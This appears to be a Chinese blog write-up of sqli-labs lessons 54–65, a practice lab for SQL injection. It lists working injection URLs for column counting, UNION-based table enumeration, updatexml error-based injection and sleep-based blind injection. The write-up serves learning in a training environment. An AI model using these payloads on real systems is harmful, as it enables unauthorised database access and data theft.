zoukankan      html  css  js  c++  java
  • Less54-Less65

    Less-54:使用’’包裹

    对输入的次数做了限制,必须在10次请求之内获取信息,否则会刷新表名

     

     

    http://192.168.27.156/sqli-labs/Less-54/?id=1'order by 4 --+   存在三列

     

    http://192.168.27.156/sqli-labs/Less-54/?id=-1'union select 1,2,3 --+   找到回显位置

     

    http://192.168.27.156/sqli-labs/Less-54/?id=-1'union select 1,2, group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES' --+

    下面按照第一关那样就可以

    Less55: 使用()包裹   对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名

    其他与第54关一致

     

     

    Less56:使用('’)包裹  其他与第54关一致

     

    Less57:使用””包裹  其他与第54关一致

     

    Less58:使用’’包裹   5次机会

     

    http://192.168.27.156/sqli-labs/Less-58/?id=-1' union select 1,2,3 --+   但是在下图并没有显示回显的位置

    所以我们使用报错注入

    http://192.168.27.156/sqli-labs/Less-58/?id=-1'andupdatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES')),1) --+

    得到表ast230gxyj

    其他与第1关是一样的

    Less59:无包裹使用报错注入方法与第58关一致

     

    Less60:使用(“”)包裹  采用报错注入与前面一致

     

    Less61:使用((‘’))包裹采用报错注入方法与前面一致

     

    Less62:使用((‘’))包裹 130  方法与前面一致

    使用时间盲注

     

    http://192.168.27.156/sqli-labs/Less-62/?id=1') and if((length(database())=1),1,sleep(5))--+

    判断数据库的长度

     

    http://192.168.27.156/sqli-labs/Less-62/?id=1') and if( left( (select table_name from information_schema.tables where

    table_schema='CHALLENGES' limit 0,1),1)> 'd' ,1, sleep(5)) --+

    判断表的第一位字母是不是比d大

     

    Less63:使用‘’包裹 130  方法与第62关一致

    使用时间盲注

     

    Less64:使用(())包裹 130  方法与第62关一致

     

    Less65:使用(“”)包裹 130  方法与第62关一致

     

  • 相关阅读:
    打开安装 好的Microsoft Dynamics CRM 4.0 报错误为 Caller does not have enough privilege to set CallerOriginToken to the specified value 的解决办法
    基于 Windows Server 2008 的计算机对 Microsoft Dynamics CRM 4.0 的支持
    Microsoft Dynamics CRM 4.0 如何添加自定义按钮
    Microsoft Dynamics CRM 4.0 Plugin 取值,赋值,查询
    C# 中的 enum(枚举) 类型使用例子
    vue事件的绑定
    表单验证2
    node中模块
    node模块的引入
    node中的读文件
  • 原文地址:https://www.cnblogs.com/7-58/p/12286709.html
Copyright © 2011-2022 走看看